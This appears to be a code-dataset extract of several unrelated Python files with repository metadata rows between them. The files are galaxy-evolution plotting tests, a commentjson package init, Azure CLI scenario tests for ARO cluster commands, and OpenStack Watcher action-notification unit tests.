            if i_m == 0:
                smf_sf0 = np.zeros(len(smf_sf[0]))
                smf_sf1 = smf_sf[1]
            else:
                smf_sf1 = smf_sf0 + smf_sf[1]
            mbin_label = ''.join([str(mlow[i_m])+', '+str(mlow[i_m] + 0.5)])
            sub.fill_between(smf_sf[0], smf_sf0, smf_sf1,
                             facecolor=pretty_colors[i_m % 20], edgecolor=None, lw=0)#, label=mbin_label)
            smf_sf0 = smf_sf1
        smf_sf = Obvs.getMF(subcat['m.sham'][isSF], weights=subcat['weights'][isSF])
        sub.plot(smf_sf[0], smf_sf[1], lw=3, c='k', ls='-')
        sub.set_xlim([6., 12.])
        sub.set_xlabel('Stellar Masses $(\mathcal{M}_{SHAM})$', fontsize=25)
        sub.set_ylim([1e-6, 10**-1.75])
        sub.set_yscale('log')
        plt.show()
    elif test == 'pssfr':
        obv_ssfr = Obvs.Ssfr()
        isSF = np.where(subcat['gclass'] == 'star-forming')
        # initial (snapshot nsnap0) SSFR distribution
        ssfr_bin_mids, ssfr_dists0 = obv_ssfr.Calculate(subcat['m.star0'][isSF],
                                                        subcat['sfr0'][isSF]-subcat['m.star0'][isSF],
                                                        subcat['weights'][isSF])
        # evolved (final snapshot) SSFR distribution
        ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(subcat['m.star'][isSF],
                                                       subcat['sfr'][isSF]-subcat['m.star'][isSF],
                                                       subcat['weights'][isSF])
        fig = plt.figure(figsize=(20, 5))
        bkgd = fig.add_subplot(111, frameon=False)
        panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
        for i_m, mass_bin in enumerate(panel_mass_bins):
            sub = fig.add_subplot(1, 4, i_m+1)
            sub.plot(ssfr_bin_mids[i_m], ssfr_dists0[i_m],
                     lw=3, ls='--', c='b')
            sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
                     lw=3, ls='-', c='k')
            # mark the SSFR of SFMS and Quiescent peak at z of snapshot 1
            sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), UT.z_nsnap(1), theta_SFMS=theta['sfms']), 0., 1.7,
                       color='b', linewidth=3)
            sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
                       color='r', linewidth=3)
            massbin_str = ''.join([
                r'$\mathtt{log \; M_{*} = [',
                str(mass_bin[0]), ',\;',
                str(mass_bin[1]), ']}$'
            ])
            sub.text(-12., 1.4, massbin_str, fontsize=20)
            # x-axis
            sub.set_xlim([-13., -8.])
            # y-axis
            sub.set_ylim([0.0, 1.7])
            sub.set_yticks([0.0, 0.5, 1.0, 1.5])
            if i_m == 0:
                sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
            else:
                sub.set_yticklabels([])
        ax = plt.gca()
        leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
                         bbox_transform=ax.transData, handletextpad=0.5)
        bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
        bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
        plt.show()
    elif test == 'smhmr':  # stellar mass to halo mass relation
        isSF = np.where(subcat['gclass'] == 'star-forming')
        smhmr = Obvs.Smhmr()
        m_mid, mu_mhalo, sig_mhalo, cnts = smhmr.Calculate(subcat['m.star'][isSF], subcat['halo.m'][isSF])
        fig = plt.figure()
        sub = fig.add_subplot(111)
        sub.errorbar(m_mid, mu_mhalo, yerr=sig_mhalo)
        # shaded band: fixed +/- 0.2 dex reference scatter
        sub.fill_between(m_mid, mu_mhalo - 0.2, mu_mhalo + 0.2, color='k', alpha=0.25, linewidth=0, edgecolor=None)
        sub.set_xlim([8., 12.])
        sub.set_xlabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylabel('Halo Mass $(\mathcal{M}_{halo})$', fontsize=25)
        plt.show()
    elif test == 'sfms':
        isSF = np.where(subcat['gclass'] == 'star-forming')
        bovy.scatterplot(subcat['m.star'][isSF], subcat['sfr'][isSF], scatter=True, s=2,
                         xrange=[8., 12.], yrange=[-4., 3.],
                         xlabel='\mathtt{log\;M_*}', ylabel='\mathtt{log\;SFR}')
        # overplot the SFMS locus and +/- 0.3 dex envelope
        m_arr = np.arange(8., 12.1, 0.1)
        plt.plot(m_arr, Obvs.SSFR_SFMS(m_arr, UT.z_nsnap(1), theta_SFMS=theta['sfms']) + m_arr, c='r', lw=2, ls='-')
        plt.plot(m_arr, Obvs.SSFR_SFMS(m_arr, UT.z_nsnap(1), theta_SFMS=theta['sfms']) + m_arr - 0.3, c='r', lw=2, ls='-.')
        plt.plot(m_arr, Obvs.SSFR_SFMS(m_arr, UT.z_nsnap(1), theta_SFMS=theta['sfms']) + m_arr + 0.3, c='r', lw=2, ls='-.')
        plt.show()
    elif test == 'delMstar':  # difference between sham M* and integrated M*
        isSF = np.where(subcat['gclass'] == 'star-forming')
        delMstar = subcat['m.star'][isSF] - subcat['m.sham'][isSF]  # Delta M*
        bovy.scatterplot(subcat['m.star'][isSF], delMstar, scatter=True, s=2,
                         xrange=[8., 12.], yrange=[-4., 4.], xlabel='\mathtt{log\;M_*}', ylabel='\mathtt{log\;M_* - log\;M_{sham}}')
        plt.show()
    elif test == 'delMgrowth':
        isSF = np.where(subcat['gclass'] == 'star-forming')
        # growth since the starting snapshot: integrated vs SHAM masses
        bovy.scatterplot(subcat['m.star'][isSF], subcat['m.star'][isSF] - subcat['m.star0'][isSF], scatter=True, s=2,
                         xrange=[8., 12.], yrange=[-4., 4.],
                         xlabel=r'{\rm Integrated}\;\mathtt{log\;M_*}', ylabel='\mathtt{log\;M_* - log\;M_0}')
        bovy.scatterplot(subcat['m.sham'][isSF], subcat['m.sham'][isSF] - subcat['m.star0'][isSF], scatter=True, s=2,
                         xrange=[8., 12.], yrange=[-4., 4.],
                         xlabel=r'{\rm SHAM}\;\mathtt{log\;M_*}', ylabel='\mathtt{log\;M_* - log\;M_0}')
        plt.show()
    elif test == 'sfh_sfms':  # plot the SFH as a function of time
        # first pick a random SF galaxy per initial-mass bin
        isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == 20))[0]
        m_bin = np.arange(9.0, 12., 0.5)
        i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
        fig = plt.figure()
        sub = fig.add_subplot(111)
        for i in np.unique(i_bin):
            i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
            # collect (M*, SFR) track from the start through every snapshot
            sfrs = [subcat['sfr0'][isSF[i_rand]]]
            mstars = [subcat['m.star0'][isSF[i_rand]]]
            for nn in range(2, 20)[::-1]:
                sfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]])
                mstars.append(subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]])
            sfrs.append(subcat['sfr'][isSF[i_rand]])
            mstars.append(subcat['m.star'][isSF[i_rand]])
            sub.scatter(mstars, sfrs, c=pretty_colors[i], lw=0)
        sub.set_xlim([9.0, 13.])
        sub.set_xlabel('Stellar Mass $(\mathcal{M}_*)$', fontsize=25)
        sub.set_ylabel('log SFR', fontsize=25)
        plt.show()
    elif test == 'sfh':  # plot the SFH as a function of time
        # first pick a random SF galaxy per initial-mass bin
        isSF = np.where((subcat['gclass'] == 'star-forming') & (subcat['nsnap_start'] == 20))[0]
        m_bin = np.arange(9.0, 12.5, 0.5)
        i_bin = np.digitize(subcat['m.star0'][isSF], m_bin)
        fig = plt.figure()
        sub = fig.add_subplot(111)
        for i in np.unique(i_bin):
            i_rand = np.random.choice(np.where(i_bin == i)[0], size=1)[0]
            # dsfrs = SFR offsets from the SFMS mean at each snapshot
            dsfrs = [subcat['sfr0'][isSF[i_rand]] - (Obvs.SSFR_SFMS(
                subcat['m.star0'][isSF[i_rand]], UT.z_nsnap(20),
                theta_SFMS=eev.theta_sfms) + subcat['m.star0'][isSF[i_rand]])[0]]
            for nn in range(2, 20)[::-1]:
                M_nn = subcat['snapshot'+str(nn)+'_m.star'][isSF[i_rand]]
                mu_sfr = Obvs.SSFR_SFMS(M_nn, UT.z_nsnap(nn), theta_SFMS=eev.theta_sfms) + M_nn
                dsfrs.append(subcat['snapshot'+str(nn)+'_sfr'][isSF[i_rand]] - mu_sfr[0])
            mu_sfr = Obvs.SSFR_SFMS(subcat['m.star'][isSF[i_rand]],
                                    UT.z_nsnap(1), theta_SFMS=eev.theta_sfms) + subcat['m.star'][isSF[i_rand]]
            dsfrs.append(subcat['sfr'][isSF[i_rand]] - mu_sfr[0])
            sub.plot(UT.t_nsnap(range(1,21)[::-1]), dsfrs, c=pretty_colors[i], lw=2)
        #sub.set_xlim([9.0, 13.])
        sub.set_xlabel('$t_{cosmic}$', fontsize=25)
        sub.set_ylabel('$\Delta$log SFR', fontsize=25)
        plt.show()
    return None
def test_assignSFRs():
    ''' Test that Evol.assignSFRs function is working as expected.

    Assigns SFRs to the full central catalog at the redshift of snapshot
    20 and plots the resulting P(log SSFR) in four stellar-mass panels,
    marking the SFMS and quiescent-peak SSFRs for reference.
    '''
    zsnaps, tsnaps = UT.zt_table()  # load in snapshot redshifts
    subhist = Cat.PureCentralHistory(nsnap_ancestor=20)
    subcat = subhist.Read()
    # load in generic theta (parameter values)
    theta = Evol.defaultTheta()
    # assign SFRs at a single redshift (snapshot 20) for all galaxies
    out = Evol.assignSFRs(subcat['m.star'], np.repeat(zsnaps[20], len(subcat['m.star'])),
                          theta_GV=theta['gv'],
                          theta_SFMS=theta['sfms'],
                          theta_FQ=theta['fq'])
    # calculate their SSFRs (log SFR - log M*)
    obv_ssfr = Obvs.Ssfr()
    ssfr_bin_mids, ssfr_dists = obv_ssfr.Calculate(subcat['m.star'], out['SFR']-subcat['m.star'])
    fig = plt.figure(figsize=(20, 5))
    # frameless background axis used only for the shared x-label
    bkgd = fig.add_subplot(111, frameon=False)
    panel_mass_bins = [[9.7, 10.1], [10.1, 10.5], [10.5, 10.9], [10.9, 11.3]]
    for i_m, mass_bin in enumerate(panel_mass_bins):
        sub = fig.add_subplot(1, 4, i_m+1)
        sub.plot(ssfr_bin_mids[i_m], ssfr_dists[i_m],
                 lw=3, ls='-', c='k')
        # mark the SSFR of SFMS and Quiescent peak at the bin's mean mass
        sub.vlines(Obvs.SSFR_SFMS(0.5 * np.sum(mass_bin), zsnaps[20], theta_SFMS=theta['sfms']), 0., 1.7,
                   color='b', linewidth=3)
        sub.vlines(Obvs.SSFR_Qpeak(0.5 * np.sum(mass_bin)), 0., 1.7,
                   color='r', linewidth=3)
        massbin_str = ''.join([
            r'$\mathtt{log \; M_{*} = [',
            str(mass_bin[0]), ',\;',
            str(mass_bin[1]), ']}$'
        ])
        sub.text(-12., 1.4, massbin_str, fontsize=20)
        # x-axis
        sub.set_xlim([-13., -8.])
        # y-axis
        sub.set_ylim([0.0, 1.7])
        sub.set_yticks([0.0, 0.5, 1.0, 1.5])
        if i_m == 0:
            sub.set_ylabel(r'$\mathtt{P(log \; SSFR)}$', fontsize=25)
        else:
            sub.set_yticklabels([])
    ax = plt.gca()
    leg = sub.legend(bbox_to_anchor=(-8.5, 1.55), loc='upper right', prop={'size': 20}, borderpad=2,
                     bbox_transform=ax.transData, handletextpad=0.5)
    bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
    bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
    plt.show()
    return None
if __name__=="__main__":
    # Scratchpad of diagnostic runs: exactly one call is active at a time;
    # uncomment the run you want and comment out the rest.
    # NOTE(review): some commented-out calls no longer match current
    # signatures (e.g. test_EvolverInitSF takes (nsnap, nsnap0, downsampled),
    # not a test-name string) — verify arguments before re-enabling.
    test_CentralSMHMR()
    #test_Evolver_time('random_step_fluct', nsnap0=15, downsampled='14', tduty=1., abias=0.)
    #test_RandomStep_timescale(sig_smhm=0.2, nsnap_ancestor=15)
    #EvolverPlots('constant_offset')
    #EvolverPlots('corr_constant_offset')
    #EvolverPlots('random_step', nsnap0=15)
    #test_AssemblyBias(0.0, nsnap0=15, downsampled='14')
    #test_Evolver_AssemblyBias(0.3, nsnap0=15)
    #EvolverPlots('constant_offset', nsnap0=15)
    #EvolverPlots('random_step', nsnap0=15)
    #EvolverPlots('random_step_fluct', nsnap0=15)
    #EvolverPlots('random_step_abias2', nsnap0=15)
    #test_Evolver_logSFRinitiate('random_step_abias', nsnap0=15)
    #test_Evolver_logSFRinitiate('random_step_fluct', nsnap0=15)
    #test_Evolver_ODEsolver('random_step_fluct', nsnap0=15)
    #test_EvolverEvolve('smf', nsnap0=15, downsampled='14')
    #test_EvolverInitiate('pssfr', 15)
    #test_EvolverInitSF('pssfr', 15, nsnap0=15, downsampled='14')
    #test_assignSFRs()
| 39.992777
| 127
| 0.565531
| 7,230
| 49,831
| 3.738036
| 0.059751
| 0.027085
| 0.014986
| 0.018871
| 0.845334
| 0.812551
| 0.789462
| 0.766188
| 0.754496
| 0.741878
| 0
| 0.04044
| 0.248701
| 49,831
| 1,245
| 128
| 40.0249
| 0.681447
| 0.089944
| 0
| 0.758323
| 0
| 0
| 0.109313
| 0.005221
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013564
| null | null | 0.013564
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cedddeedf3b9cafd3319b7a23f662f2f1cf814f6
| 209
|
py
|
Python
|
commentjson/__init__.py
|
mattpearson/commentjson
|
cb7219dcc6761c7c06cca0d8724908bc2477ab29
|
[
"MIT"
] | null | null | null |
commentjson/__init__.py
|
mattpearson/commentjson
|
cb7219dcc6761c7c06cca0d8724908bc2477ab29
|
[
"MIT"
] | null | null | null |
commentjson/__init__.py
|
mattpearson/commentjson
|
cb7219dcc6761c7c06cca0d8724908bc2477ab29
|
[
"MIT"
] | null | null | null |
from .commentjson import dump
from .commentjson import dumps
from .commentjson import JSONLibraryException
from .commentjson import ParserException
from .commentjson import load
from .commentjson import loads
| 29.857143
| 45
| 0.856459
| 24
| 209
| 7.458333
| 0.375
| 0.502793
| 0.703911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114833
| 209
| 6
| 46
| 34.833333
| 0.967568
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0c6fb3588766073fbb9d71f8aa6745f4c3cdf5b4
| 15,265
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/aro/tests/latest/test_aro_commands.py
|
kwoodson/azure-cli
|
4efdc3a2f1d72d1102d8a1969bbc97b518353d6a
|
[
"MIT"
] | 2
|
2020-08-08T11:00:25.000Z
|
2020-08-08T11:00:30.000Z
|
src/azure-cli/azure/cli/command_modules/aro/tests/latest/test_aro_commands.py
|
kwoodson/azure-cli
|
4efdc3a2f1d72d1102d8a1969bbc97b518353d6a
|
[
"MIT"
] | 1
|
2021-06-02T02:49:48.000Z
|
2021-06-02T02:49:48.000Z
|
src/azure-cli/azure/cli/command_modules/aro/tests/latest/test_aro_commands.py
|
anjannaskar93/azure-cli-100
|
cc3a15959e8a19a3e24fa4e8648dea3c32ffd901
|
[
"MIT"
] | 1
|
2020-07-31T17:22:13.000Z
|
2020-07-31T17:22:13.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import unittest
from random import randint
import mock
from knack.log import get_logger
from azure_devtools.scenario_tests import AllowLargeResponse
from azure.cli.testsdk import ScenarioTest, ResourceGroupPreparer
from azure.cli.testsdk.checkers import StringContainCheck
logger = get_logger(__name__)
class AroScenarioTests(ScenarioTest):
    """Scenario tests for the `az aro` command group.

    Every test provisions the same environment: randomized cluster/subnet
    names and IP ranges stored in ``self.kwargs``, a ``dev-vnet`` with
    master/worker subnets, and (via a mocked role-assignment UUID
    generator) an ARO cluster tagged per test. The previously sixfold
    duplicated setup is factored into the private helpers below; each
    public test method keeps its original name, decorators, command
    strings, and checks.
    """

    def _prepare_cluster_kwargs(self, resource_group):
        """Populate ``self.kwargs`` with randomized cluster parameters.

        Random names/ranges are generated in the same order as the original
        inline code so recorded scenarios replay identically.

        :param resource_group: name injected by ResourceGroupPreparer.
        :return: the randomly generated cluster name.
        """
        from msrestazure.tools import resource_id
        subscription = self.get_subscription_id()
        master_subnet = self.create_random_name('dev_master', 14)
        worker_subnet = self.create_random_name('dev_worker', 14)
        name = self.create_random_name('aro', 14)
        self.kwargs.update({
            'name': name,
            'resource_group': resource_group,
            'subscription': subscription,
            'master_subnet': master_subnet,
            'worker_subnet': worker_subnet,
            'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
            'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
            'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
            'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
        })
        return name

    def _prepare_network(self):
        """Create dev-vnet plus the master/worker subnets referenced by self.kwargs."""
        self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
        self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
        self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
        self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')

    def _create_cluster(self, tag, checks=None):
        """Run `aro create` with a deterministic (mocked) role-assignment UUID.

        :param tag: value for the ``test=<tag>`` resource tag.
        :param checks: optional list of checks forwarded to ``self.cmd``.
        """
        with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
            self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=' + tag,
                     checks=checks)

    @AllowLargeResponse()
    @ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_create', location='eastus')
    def test_aro_create(self, resource_group):
        """`aro create` returns the expected name, subnets, tags and state."""
        self._prepare_cluster_kwargs(resource_group)
        self._prepare_network()
        self._create_cluster('create', checks=[
            self.check('tags.test', 'create'),
            self.check('name', '{name}'),
            self.check('masterProfile.subnetId', '{master_subnet_resource}'),
            self.check('workerProfiles[0].subnetId', '{worker_subnet_resource}'),
            self.check('provisioningState', 'Succeeded')
        ])

    @AllowLargeResponse()
    @ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_list_cred', location='eastus')
    def test_aro_list_credentials(self, resource_group):
        """`aro list-credentials` returns the kubeadmin credentials."""
        self._prepare_cluster_kwargs(resource_group)
        self._prepare_network()
        self._create_cluster('list-cred')
        self.cmd('aro list-credentials -g {rg} -n {name} --subscription {subscription}', checks=[self.check('kubeadminUsername', 'kubeadmin')])

    @AllowLargeResponse()
    @ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_show', location='eastus')
    def test_aro_show(self, resource_group):
        """`aro show --output table` contains name, group, location and state."""
        name = self._prepare_cluster_kwargs(resource_group)
        self._prepare_network()
        self._create_cluster('show')
        self.cmd('aro show -g {rg} -n {name} --subscription {subscription} --output table', checks=[
            StringContainCheck(name),
            StringContainCheck(resource_group),
            StringContainCheck('eastus'),
            StringContainCheck('Succeeded'),
        ])

    @AllowLargeResponse()
    @ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_list', location='eastus')
    def test_aro_list(self, resource_group):
        """`aro list` includes the freshly created cluster."""
        self._prepare_cluster_kwargs(resource_group)
        self._prepare_network()
        self._create_cluster('list')
        self.cmd('aro list -g {rg} --subscription {subscription}', checks=[
            self.check('[0].name', '{name}'),
            self.check('[0].provisioningState', 'Succeeded'),
            self.check_pattern('[0].id', '.*{name}')
        ])

    @AllowLargeResponse()
    @ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_delete', location='eastus')
    def test_aro_delete(self, resource_group):
        """`aro delete -y` succeeds on an existing cluster."""
        self._prepare_cluster_kwargs(resource_group)
        self._prepare_network()
        self._create_cluster('delete')
        self.cmd('aro delete -y -g {rg} -n {name} --subscription {subscription}', expect_failure=False)

    @AllowLargeResponse()
    @ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_update', location='eastus')
    def test_aro_update(self, resource_group):
        """`aro update` succeeds on an existing cluster."""
        self._prepare_cluster_kwargs(resource_group)
        self._prepare_network()
        self._create_cluster('update')
        self.cmd('aro update -g {rg} -n {name} --subscription {subscription}', expect_failure=False)
| 67.246696
| 232
| 0.688241
| 1,882
| 15,265
| 5.352816
| 0.069075
| 0.065515
| 0.032758
| 0.042883
| 0.902918
| 0.886043
| 0.874131
| 0.871253
| 0.871253
| 0.861326
| 0
| 0.020998
| 0.163904
| 15,265
| 226
| 233
| 67.544248
| 0.768315
| 0.022011
| 0
| 0.731429
| 0
| 0.171429
| 0.445189
| 0.104999
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034286
| false
| 0
| 0.08
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c8675bccd5384229259eb1af6b81163bec0cc68
| 22,442
|
py
|
Python
|
python-watcher-2.0.0/watcher/tests/notifications/test_action_notification.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | null | null | null |
python-watcher-2.0.0/watcher/tests/notifications/test_action_notification.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
python-watcher-2.0.0/watcher/tests/notifications/test_action_notification.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import freezegun
import mock
import oslo_messaging as om
from watcher.common import exception
from watcher.common import rpc
from watcher import notifications
from watcher import objects
from watcher.tests.db import base
from watcher.tests.objects import utils
@freezegun.freeze_time('2016-10-18T09:52:05.219414')
class TestActionNotification(base.DbTestCase):
    def setUp(self):
        """Patch the RPC notifier and build goal/strategy/audit/action-plan fixtures.

        Replaces ``rpc.get_notifier`` with a mock so tests can inspect the
        emitted notifications via ``self.m_notifier``.
        """
        super(TestActionNotification, self).setUp()
        p_get_notifier = mock.patch.object(rpc, 'get_notifier')
        m_get_notifier = p_get_notifier.start()
        self.addCleanup(p_get_notifier.stop)
        self.m_notifier = mock.Mock(spec=om.Notifier)
        def fake_get_notifier(publisher_id):
            # Record the publisher id so tests can assert on it later.
            self.m_notifier.publisher_id = publisher_id
            return self.m_notifier
        m_get_notifier.side_effect = fake_get_notifier
        # NOTE: creating these fixture objects emits notifications of their
        # own, which the tests account for in their call-count assertions.
        self.goal = utils.create_test_goal(mock.Mock())
        self.strategy = utils.create_test_strategy(mock.Mock())
        self.audit = utils.create_test_audit(mock.Mock(),
                                             strategy_id=self.strategy.id)
        self.action_plan = utils.create_test_action_plan(mock.Mock())
    def test_send_invalid_action_plan(self):
        """send_update raises InvalidActionPlan for an action plan in an unknown state."""
        action_plan = utils.get_test_action_plan(
            mock.Mock(), state='DOESNOTMATTER', audit_id=1)
        self.assertRaises(
            exception.InvalidActionPlan,
            notifications.action_plan.send_update,
            mock.MagicMock(), action_plan, host='node0')
def test_send_action_update(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.ONGOING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_update(
mock.MagicMock(), action, host='node0',
old_state=objects.action.State.PENDING)
# The 1st notification is because we created the object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
payload = notification['payload']
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionUpdatePayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state_update': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionStateUpdatePayload',
'watcher_object.data': {
'old_state': 'PENDING',
'state': 'ONGOING'
}
},
'state': 'ONGOING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
},
payload
)
def test_send_action_plan_create(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.PENDING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_create(mock.MagicMock(), action,
host='node0')
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
payload = notification['payload']
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionCreatePayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'PENDING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
},
payload
)
def test_send_action_delete(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.DELETED,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_delete(mock.MagicMock(), action,
host='node0')
# The 1st notification is because we created the audit object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
payload = notification['payload']
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionDeletePayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'DELETED',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
},
payload
)
